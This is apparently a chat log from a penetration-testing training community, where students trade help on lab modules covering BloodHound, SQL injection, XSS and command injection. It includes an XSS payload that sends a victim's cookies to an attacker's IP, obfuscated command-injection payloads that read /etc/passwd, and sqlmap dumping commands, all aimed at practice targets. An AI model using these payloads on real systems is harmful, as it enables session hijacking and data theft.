
if you are just looking for the trusts try SharpHound v1.0.4 (got the same issue in offshore)

hallow kiln
#

could it be the machine somehow? cause if I recall properly I ran bloodhound-python sometime at the beginning of the module and don't remember if I ever had it to run it again

sly dome
#

the only thing i get is a lot of DNS queries fail with bh-python but i think thats normal

#

coz they actual lab has only 3 machines

hallow kiln
#

try with --dns-timeout 30 --dns-tcp at the end of your command

#

once it starts querying computers it does get a lot of fails since they're not active like you said

sly dome
#

i still cant map domain trusts xD

minor sonnet
#

hello , i have a problem on blind sql injecion module. ,does anyone finish this module ?

sly dome
#

i want to understand ...

minor sonnet
#

I am stuck on time based sqli ( data extraction ) question ,
I have dump the database name , tables , and the columns but i am not able to dump the data

sly dome
#

maybe?

hallow kiln
vital adder
sly dome
#

fixed in 4.3.1

minor sonnet
#

thank you

sly dome
#

im on 4.3.1 and it should be fixed kek

vital adder
#

oh no that's an old version of SharpHound the new one never got the trusts for me

next bronze
#

maybe the built in query is broken? try this

MATCH (obj1), (obj2) WHERE obj1.name = '<DOMAIN1>' AND obj2.name = '<DOMAIN2>' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p
sly dome
#

im just confused about arth0s getting it with bloodhound-python lol

next bronze
#

did you fill in the domain names

sly dome
#

HAHAHA

#

no.

#

at this point im upset

hallow kiln
#

you could try on one of the earlier machines in the module, who knows

sly dome
#

MATCH (obj1), (obj2) WHERE obj1.name = 'INLANEFREIGHT.LOCAL' AND obj2.name = 'FREIGHTLOGISTICS.LOCAL' AND NOT obj1 = obj2 MATCH p = shortestPath((obj1)-[*..10]->(obj2)) RETURN p

#

no luck

next bronze
#

nothing showed?

sly dome
#

nope

next bronze
#

welp means it didn't get the trust at all then

sly dome
#

bloodhound-python from the SSH instance?

#

or you pivoted

hallow kiln
#

pivot with ligolo-ng

sly dome
#

me 2

#

weirdo.

#

i installed it with pipx

#

found the problem

tender lake
#

In Shells & Payloads, the skill assessment, were we supposed to be able to get the creds without the hints in the scenario? If so, how?

vital adder
minor sonnet
#

i am studying this module right now

sly dome
#

working with BH 4.3.0 with any ingestion method

#

4.3.1 no luck...

elfin needle
minor sonnet
#

have you solved the time based extraction ?

#

Sure

vital adder
sly dome
#

yea the changes came in 4.3.1

#

for 4.3.1 u need SH 2.0.1

vital adder
#

so the issue was bloodhound it self? 4.2.0 on the pwnbox worked for me with multiple scan methods

sly dome
#

yes it is

#

do you want a tldr?

vital adder
# sly dome do you want a tldr?

🤷‍♂️ if it works, it works but testing a bunch of stuff just show me that the only version of SharpHound that doesn't get the trust is SharpHound v1.1.0 and the v2.x just doesn't want to work for some reason

sly dome
#

for 2.0.1 you need BH 4.3.1

#

bloodhound-python only works for BH >= 4.2 and <=4.3.0

vital adder
#

oh i mean it doesn't want to run on the target for some reason (ldap errors)

sly dome
#

unless you change trusts.py

sly dome
#

what was the other common compatibility error?

#

im getting notes on all this BH stuff

#

This version of BloodHound.py is only compatible with BloodHound 4.2 or newer. For the 3.x range, use version 1.1.1 via pypi. As of version 1.3, BloodHound.py only supports Python 3, Python 2 is no longer tested and may break in the future.

#

oh this was

obsidian bridge
#

Hello guys

ionic heron
#

good afternoon

obsidian bridge
#

Have someone done advanced sql injection course

#

had you done advanced sql injection course

umbral fulcrum
# supple patio did you check tables inside them?

staright ahead I did:
|| sqlmap -u 'http://<IP>:<PORT>/*.php' --data='{"id":1}' --no-cast --random-agent --tamper=between --level=5 --risk=3 --schema ||
then:
||-D production -T final_flag ||
but I couldn't C the table content !!!!

after what U said I did:
||--dbs ||
got 2: || information_schema || & || production ||

then I did:
|| -D information_schema --tables || & || -D production --tables ||
got || final_fqag || did:
||-D production -T final_fqag || that did not exist but when I did again || production -T final_flag || got the table content

now I'm confuse ...
what I did at the start was good (had problem with the internet or a HTB bug) or did I needed to do the DB enumeration to get some sort of permission??

sly dome
#

is it time based? xd

umbral fulcrum
sly dome
#

yes

umbral fulcrum
# sly dome yes

I think it did asked me about it ...
but how that make a difference?

sly dome
#

time based sometimes miss some character

umbral fulcrum
#

well it didn't give me the whole content of the table ...

#

and I saw somewhere here that it happened to some other players ...

umbral fulcrum
rustic sage
#

why?

narrow solar
hallow kiln
narrow solar
hallow kiln
# narrow solar

The last option is to prepend commands with faketime -f +7h or whatever the clock skew is

hallow kiln
hybrid prairie
#

I'm currently working on the Windows Priv Esc module, in the credential hunting section. The first question asks me to find a file with a password in it, I've found three different files with passwords in them. What appears to be the most obvious answer is a txt file in the htb-student documents directory. It doesn't appear to be the answer to the question. Is the question incorrect or do I keep looking for more possibilities?

hallow kiln
rustic sage
#

What would be a good alternative to "evil-winrm"?

hallow kiln
#

Writing your own

rustic sage
hallow kiln
fathom pendant
#

^

spring viper
#

its on the box keep searching

#

the module has everything you need for it

rustic sage
#

guys i need help with POST JSON

#

who can help me?

#

"["London (UK) "]curl: (3) bad range in URL position 2:
[London (UK)]

orchid pine
#

heloo guys on lifi module section of prvention second question Edit the php.ini file to block system()

#

do i need to disable the system function

#

? iv been stuck here the whole day

obsidian bridge
#

Hello guys

#

Did you know jjava

#

did someone know java

orchid pine
acoustic owl
#

When it comes to the programming language, try it in #programming

#

if you have no access, then read and follow #welcome

hybrid prairie
spring viper
#

do you want to dm me the findstr command you are using

manic wolf
kind turret
#

The fact that they don't allow more than one public class in a file turns off my mind 💔

kind turret
#

java...

sly dome
#

va…

manic wolf
#

Why is everyone here dissing Java de Hutt

fathom pendant
#

It's (not) just a meme

rustic sage
#

What's the first steps i should take if i wanna learn hacking?

acoustic sparrow
#

hey facing the same issue already turned of realtime protection still no luck

#

fix= start cmd as admin 🙂

compact patrolBOT
acoustic owl
marsh notch
#

there is more than one user that can log in with smb. Make sure you have the right user. The name of the detected share will be a clue.

acoustic sparrow
#

hey guys anyone already finished the RDP and SOCKS Tunneling with SocksOverRDP module i set everything up last step is it to rdp into 172.16.6.155 from the piviot host but this is what i get

proud notch
#

For Active Subdomain Enumeration I am working on the second problem where it states to Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I believe I was able to find the answer with the command ||dig any axfr “inlanefreight.htb” @<target ip>|| during when I finally got the results I saw these that looked weird and assuming they were the zones I submitted them and it turned out to be right. I wanted to confirm if these were indeed the correct zones and if there are any other way to look for these.

|| ww02.inlanefreight.htb||
|| www1.inlanefreight.htb ||

acoustic owl
undone narwhal
proud notch
undone narwhal
proud notch
undone narwhal
acoustic owl
undone narwhal
#

oh nvm, he was using ip

acoustic sparrow
dreamy solar
#

Hello for this I don't succeed to recover hash ntlmv2 why?

fathom pendant
dreamy solar
#

No, I thinked to have a admin password

#

Thanks

pure sorrel
#

Hello, I'm doing the Attacking Common Services: Attacking DNS and foe the life of me can't figure out how to get the records. I've got all the subdomains but keep getting errors with dig and fierce

#

Is anyone able to help?

acoustic sparrow
austere sandal
#

everyone 🫠

fossil crescent
#

Unsure if you're still stuck, but I just got to SA and am (seemingly) in same position as you... And while the course did cover a (small) bit of file-uploads in the CSP bypasses, doesn't seem applicable in this case...

hidden trellis
kind turret
#

@hidden trellis @fossil crescent DMing you.

autumn elk
#

How did you get it when I used the proxychains Firefox-est 172.x.x.x after setting everything up and it times out.

stoic pagoda
#

hello. is the academy's avatar changeable ?

acoustic owl
stoic pagoda
warped oasis
#

Having an issue on the "Cracking Passwords with Hashcat" module. I download the zip, unzip the .cap file and have used both cap2hccapx and hcxpcaptool to the same result. Running Hashcat on the resulting .hccapx file returns several lines of "seperator unmatched" errors. Any hints on what i'm doing wrong here?

Sample of error:
Hashfile 'mic1.hccapx' on line 1 (HCPX): Separator unmatched
Hashfile 'mic1.hccapx' on line 2 (
��2...�٤��-6�!�J��陖����7�����y): Separator unmatched

umbral fulcrum
#

hey guys,
In module "in module "Cross-Site Scripting (XSS)" ==>> "XSS Discovery"
in the use of "xsstrike" I don't C the difference between "store xss" and "reflected xss"

when I used it on the exercise of "stored xss" I got the same result as I did when I did it in "reflected xss"
so I don't understand where should I C the result??
maybe someone can point out to me what I missed ...

rich mulch
#

=====
Hello guys, I am stuck at Local File Inclusion, at section Automated scanning. I did found the parameter to include, but I did not find any useful files to inject payload. Which file I should include?

dreamy solar
#

Hello guys, I have a problem for this, I must what domain name? User? and can I use raiseChild ?

hallow kiln
dreamy solar
hallow kiln
paper gust
dreamy solar
paper gust
dreamy solar
hallow kiln
#

I think it's the same as the regular student password, but it's not explicitly in my notes for that module

dreamy solar
#

I tested it doesn't work unfortunately

brave sail
#

For anyone doing the DOCUMENTATION & REPORTING module, the attack chain is supposed to be formatted into the findings section? As they are both different parts of the report. Both should be included.

rustic sage
#

hello, i don't understand the question To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above.

#

if someone can help me pls

#

it's the question of HyperText Transfer Protocol (HTTP)

brave sail
#

i can prob look at it

rustic sage
#

web requests

#

thx

#

I don't understand what is a flag and how i can get it

#

and i don't understand about which exercice they are talking

last thunder
#

Yo

brave sail
#

So curl sends http requests the same as a Web browser does.

last thunder
#

I'm not in a. Good mood

brave sail
#

When you send a web request to the file they are mentioning you should be able to access it's content through the terminal

last thunder
#

This RETART is tryna scam me he hack my old acc and inactive he's saying his frend hacked it back he trying to get my playstaion one but epic don't belive it my og ACC and it inactive and I have to pay to get it back but I can't

rustic sage
#

yes i succeed to get the content

brave sail
#

it works the same as a web browser: you have to enter the server location and file you want to access in url format

#

cool!

rustic sage
#

but i don't understand what is a flag

#

inlanefreight is a website but index.html ?

brave sail
#

it's a file index.html : )

#

html type

rustic sage
#

ok so i am registering inlanefreight code in index.html ?

#

so index.html is just a name i can put wiss213.html ?

brave sail
#

mhmm

acoustic owl
rustic sage
#

ok

#

and what is a flag ?

acoustic owl
#

However, you must then change the web server configuration so that it does not deliver index.html as the first document, but wiss213.html

acoustic owl
last thunder
#

Yo who can teach me how to hack

acoustic owl
rustic sage
brave sail
#

it serves as a way to demonstrate you have access to a string of characters, the challenge becomes getting to that very place

acoustic owl
rustic sage
#

but xhere in the source code

#

i have the source code

brave sail
#

it tends to be formatted as: HTB{<stringof characters>}

rustic sage
#

i think that i am not in the good document

#

so i put in sh

halcyon wing
#

Anyone free to answer a question regarding identification of bad characters in the module Stack-Based Buffer Overflows on Windows x86 ?

rustic sage
#

and i enter in download.php document

#

It's the good beginning ?

brave sail
#

so, the exercise isn't about the inlanefreight server, but rather the one you spawn in the ending of the section

rustic sage
#

the problem is that i have nothing in the ending

#

so my end is

#

As the above message mentions, we may use --help all to print a more detailed help menu, or --help category (e.g. -h http) to print the detailed help of a specific flag. If we ever need to read more detailed documentation, we can use man curl to view the full cURL manual page.

In the upcoming sections, we will cover most of the above flags and see where we should use each of them.

acoustic owl
#

A flag for a command is for example -h It often stands for help

rustic sage
#

ok

brave sail
#

So it was really about differentiating between flag(target string) and flag(command edit) : |

rustic sage
#

yes

brave sail
#

okey okey

rustic sage
#

so what i should do ?

brave sail
#

what do you mean? xd

rustic sage
#

so the question ask a traget string or a command edit ?

brave sail
#

a target string

rustic sage
#

ok

last thunder
#

Can someone hack my og ACC back. Please I don't want to pay

brave sail
#

yeye xd

rustic sage
#

To access to target string i should enter in document code

brave sail
#

yes sir

rustic sage
#

so i should put curl -O server/FILE

brave sail
#

yes

rustic sage
#

but i don't have the server

brave sail
rustic sage
#

okkkkkkkkkkkkkkkkkkkkkkkkkkk

brave sail
#

right before the question

#

xdd

rustic sage
#

For 3 days i did not understand what is target

#

i thought that is for professionnal like a target to hack

brave sail
rustic sage
#

ok thxxxx

brave sail
#

you'll see that th inlanefreight appears multiple times as a made up comany

rustic sage
#

ok thx

brave sail
#

np, gl

rustic sage
#

and i can put ip adress in curl without problems

#

?

brave sail
#

yhea

rustic sage
#

ok

#

so i should make curl -O IP-ADRESS/download.php

brave sail
#

i think this is as far i can say xd

rustic sage
#

i succeed

#

thx

brave sail
#

cool!

umbral fulcrum
#

someone can help with "Cross-Site Scripting (XSS) " ==>> "Session Hijacking"

acoustic owl
umbral fulcrum
# acoustic owl What exactly is not working?

maybe me .... 😵‍💫

I opened a server and enter all 5 ways they mentioned in the section in the inputs (nothing gave me a response)

I also tried to enter all inputs with the || new Image().src='http://OUR_IP/index.php?c='+document.cookie ||
also didn't get a response

I'm guessing I'm missing something but I don't understand what it is

acoustic owl
umbral fulcrum
umbral fulcrum
#

so I think it's something els I'm doing wrong...

acoustic owl
umbral fulcrum
acoustic owl
sturdy otter
#

Heyoo, does someone know why Domain is not needed for LINUX01$ with this keytab file? Is it only Hostname for Computeraccounts without Domain? Keytab only works with "LINUX01$" thaaanks

dreamy solar
#

I still haven't found the password to move forward here

strong elk
hallow kiln
#

all the way back in LLMNR poisoning

sly dome
#

finding/relevant information of the domain(s)

sly dome
#

kinit 'LINUX01$@INLANEFREIGHT.LOCAL'

tough kettle
#

Hey guys , can I dm someone for help . I've been stuck on 'Attacking common services' assessments .

desert cypress
#

Hi everyone, I have a small question about the "COMMAND INJECTIONS" module "Bypassing Blacklisted Commands" the "Linux only" Part.
I'm trying to use the whoami / cat command with the " \ " to be able to bypass the command blacklist.
My aim is to be able to run "who\ami" for example using this payload who$(tr${IFS}'!-}'${IFS}'"-~'<<<[)ami . Problem: my shell interprets it as "who\ami" but I get a "command not found".

#

and if I run who\ami directly it works. I think this is due to the interpretation of the command, but if anyone could shed some light on this, that would be great.

#

if anyone would like to send me a mp to give me more information, I'm available.

#

thank's 🙏

echo widget
#

Hello guys,
I'm currently stuck on the skill assessment, for the module "NTLM RELAY ATTACKS".
I have compromised the BACKUP01 server but I don't know what to do next.
I think i'm missing something, if anyone would like to send me a mp for a hint.
thank's !

dreamy solar
#

Hey guys where is the problem ? please

desert cypress
#

if anyone can explain why this work on my shell bash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac') but this not works in burp responder ``` ip=127.0.0.1%0abash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac')

next bronze
next bronze
desert cypress
next bronze
#

from experience, heavy obfuscation like this won't always work, and just because it works in your shell doesn't mean it will work elsewhere, could be the target's environment, the shell it's using, encoding probelms, etc

#

I don't remember having to do this much for that module

desert cypress
desert cypress
next bronze
#

is it also through burp?

desert cypress
#

yes, to explain my approach I do (for cat /etc/passwd) :

echo 'cat${IFS}${PATH:0:1}etc${PATH:0:1}passwd' | rev
   dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac

I tried on my shell
bash<<<$(rev<<<'dwssap}1:0:HTAP{$cte}1:0:HTAP{$}SFI{$tac')
and I put it in burp
#

I do the same for 'ls -al /home'

dreamy solar
#

but excuse me I search for a while in other courses I can't find the password for this user to move forward with this exercise

sly dome
#

literally the previous section

next bronze
tribal wadi
#

can i ask question about Logrotate - LINUX PRIVILEGE ESCALATION module ??